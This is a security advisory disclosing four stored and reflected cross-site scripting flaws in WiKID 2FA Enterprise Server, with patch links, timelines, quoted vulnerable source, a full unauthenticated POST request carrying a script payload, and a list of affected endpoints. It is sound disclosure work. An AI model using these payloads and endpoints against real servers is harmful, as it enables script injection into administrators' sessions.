WiKID 2FA Enterprise Server Cross-Site Scripting

CVE-2019-17114

A stored and reflected cross-site scripting vulnerability, CVE-2019-17114, was identified on WiKID Systems 2FA Enterprise Server version 4.2.0-b2047 and earlier. The preRegistrationData parameter, used on userPreregistration.jsp, reflects malicious HTML elements contained in an uploaded .csv. The contents of the file are stored and the malicious HTML elements rendered whenever List Pre-Registration is used.

Patch

• 4.2.0.b2053: https://downloads.wikidsystems.com/wikid-server-enterprise-4.2.0.b2053-1.noarch.rpm

Timeline

• 26 Sep 2019 - Issue discovered on WiKID Systems 2FA Enterprise Server 4.2.0-b2032
• 29 Sep 2019 - Issue disclosed to WiKID Systems
• 09 Oct 2019 - Issue confirmed by WiKID Systems, Patch released
• 16 Oct 2019 - Public Disclosure

Description

The source for userPreregistration.jsp shows values for pre_registration_code and name columns in database being retrieved and added to a string being constructed:

272  sb.append("</font></td><td style=\"padding: 5px;\"><font face=\"courier\" size=\"-1\">")
273  .append(rs.getString("pre_registration_code"))
274  .append("</font></td><td style=\"padding: 5px;\"><font face=\"courier\" size=\"-1\">")
275  .append(URLDecoder.decode(rs.getString("name"),"UTF-8"))
276  .append("</font></td></tr>");

The constructed string is then included in the HTML of the page. The values retrieved from the database are not validated or sanitized, consequently, creating a file containing malicious entries such as:

<script>alert(1)</script>,<script>alert(2)</script>

Will result in the <script> elements being included in the page; the JavaScript will execute when the file is uploaded:

The malicious name and pre_registration_code are stored and will trigger whenever userPreregistration.jsp?prAction=List+Pre-Registration+Data is visited:

The malicious <script> elements are visible in the page source:

<tr><td colspan="2"><h2>Current Pre-Registration Data</h2></td></tr>
 <tr><td><b>UserID</b></td><td><b>Registration Code</b></td><td><b>Domain</b></td></tr>
 <tr style="padding: 5px;"><td style="padding: 5px;"><font face="courier" size="-1"><script>alert(2)</script> (unregistered)</font>

CVE-2019-17115

An unauthenticated stored cross-site scripting vulnerability, CVE-2019-17115, was identified on WiKID Systems 2FA Enterprise Server version 4.2.0-b2047 and earlier. Submitting invalid values, through one of the affected parameters, will cause an error to be logged and stored as a rendered_message; the malicious value is retrieved and displayed through Logs.jsp. The error messages are severe enough to be displayed by default.

Patch

• 4.2.0.b2053: https://downloads.wikidsystems.com/wikid-server-enterprise-4.2.0.b2053-1.noarch.rpm

Timeline

• 26 Sep 2019 - Issue discovered on WiKID Systems 2FA Enterprise Server 4.2.0-b2032
• 29 Sep 2019 - Issue disclosed to WiKID Systems
• 09 Oct 2019 - Issue confirmed by WiKID Systems, Patch released
• 16 Oct 2019 - Public Disclosure

Description

The source for Logs.jsp reveals values from the rendered_message column are included, unsanitized, in a string which is constructed and included in the HTML for Logs.jsp

394  sb.append("<TD class=\"logTableCell\" style=\"white-space:normal;\">")
395  .append("<a href='./Log.jsp?subString=" + rs.getString("rendered_message") + "'>")
396  .append("<img src='./images/toolFilter.png' alt='' border=\"0px\" width=\"15px\" height=\"15px\"/></a>")
397  .append(rs.getString("rendered_message").replaceAll("<", "&lt;").replaceAll(">", "&gt;"))
398  .append("</TD>");

wikid-server-enterprise-lib-4.2.0.jar reveals several instance where parameters are read and passed to the logger. One example can be found in com.wikidsystems.server.InitDevice5AES:

70 try {
71 requestAction = Integer.parseInt(request.getParameter("a"));
72 logger.debug("Determined requested action: " + requestAction);
73 }
74 catch (NumberFormatException nfe) {
75 nfe.printStackTrace();
76 logger.error("IO error during registration -- recieved action: " + request.getParameter("a"), nfe);
77 }

A non-integer value for a will trigger an error and drop into the catch block; the a parameter is then included, in the message passed to logger, with the severity of error.

The following request submits an HTML <script> element as the value for a:

POST /wikid/servlet/com.wikidsystems.server.InitDevice5AES HTTP/1.1
Host: $RHOST
User-Agent: WiKID J2ME Token
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Payload: dGVzdA==
Connection: close
Upgrade-Insecure-Requests: 1=
Content-Type: application/x-www-form-urlencoded
Content-Length: 60


S=1&a=test'><script>alert('InitDevice5AES - A')</script><!--

The JavaScript is executed whenever Log.jsp is visited:

The malicious <script> is visible in source of the page:

<a href="./Log.jsp?subString=IO error during registration phase 1 -- recieved action: test"><script>alert('InitDevice5AES - A')</script><!--'><img src='./images/toolFilter.png' alt=''

The following parameters and endpoints are known to be vulnerable and do not require authentication:

(1) H parameter
 - /wikid/servlet/com.wikidsystems.server.GetDomainHash
(2) S parameter
 - /wikid/DomainData
 - /wikid/PreRegisterLookup
 - /wikid/PreRegister
 - /wikid/InitDevice
 - /wikid/servlet/InitDevice2S
 - /wikid/servlet/InitDevice3S
 - /servlet/com.wikidsystems.server.InitDevice2S
 - /servlet/com.wikidsystems.server.InitDevice3S
 - /servlet/com.wikidsystems.server.InitDevice4S
 - /wikid/servlet/com.wikidsystems.server.InitDevice4AES
 - /wikid/servlet/com.wikidsystems.server.InitDevice5AES
(3) a parameter
 - /wikid/PreRegisterLookup
 - /wikid/InitDevice
 - /wikid/servlet/InitDevice2S
 - /wikid/servlet/InitDevice3S
 - /servlet/com.wikidsystems.server.InitDevice2S
 - /servlet/com.wikidsystems.server.InitDevice3S
 - /servlet/com.wikidsystems.server.InitDevice4S
 - /wikid/servlet/com.wikidsystems.server.InitDevice4AES
 - /wikid/servlet/com.wikidsystems.server.InitDevice5AES

CVE-2019-17116

A stored and reflected cross-site scripting vulnerability, CVE-2019-17116, was identified on WiKID Systems 2FA Enterprise Server version 4.2.0-b2047 and earlier. The groupName parameter, used on groups.jsp, reflects malicious HTML submitted as New Group. The malicious elements are stored and rendered whenever groups.jsp is visited.

Patch

• 4.2.0.b2053: https://downloads.wikidsystems.com/wikid-server-enterprise-4.2.0.b2053-1.noarch.rpm

Timeline

• 26 Sep 2019 - Issue discovered on WiKID Systems 2FA Enterprise Server 4.2.0-b2032
• 29 Sep 2019 - Issue disclosed to WiKID Systems
• 09 Oct 2019 - Issue confirmed by WiKID Systems, Patch released
• 16 Oct 2019 - Public Disclosure

Description

When a value like test<script>alert(1)</script> is used for New Group:

The <script> element is included in the page and the JavaScript triggers immediately:

The group name is stored by the application; the JavaScript triggers whenever groups.jsp is visited:

CVE-2019-17120

A stored and reflected cross-site scripting vulnerability, CVE-2019-17120, was identified on WiKID Systems 2FA Enterprise Server version 4.2.0-b2047 and earlier. The usr parameter, used by adm_usrs.jsp, reflects malicious HTML elements entered as the Username for a new admin. The malicious HTML elements are rendered whenever the Administrator Management Page is visited.

Patch

• 4.2.0.b2053: https://downloads.wikidsystems.com/wikid-server-enterprise-4.2.0.b2053-1.noarch.rpm

Timeline

• 26 Sep 2019 - Issue discovered on WiKID Systems 2FA Enterprise Server 4.2.0-b2032
• 29 Sep 2019 - Issue disclosed to WiKID Systems
• 09 Oct 2019 - Issue confirmed by WiKID Systems, Patch released
• 16 Oct 2019 - Public Disclosure

Description

When an admin user is created with a name containing HTML elements like test<script>alert(1)</script>:

The element is included in the page, in this instance the JavaScript triggers immediately:

The malicious username is stored and appears in the list of admin users; the JavaScript triggers whenever adm_usrs.jsp is visited: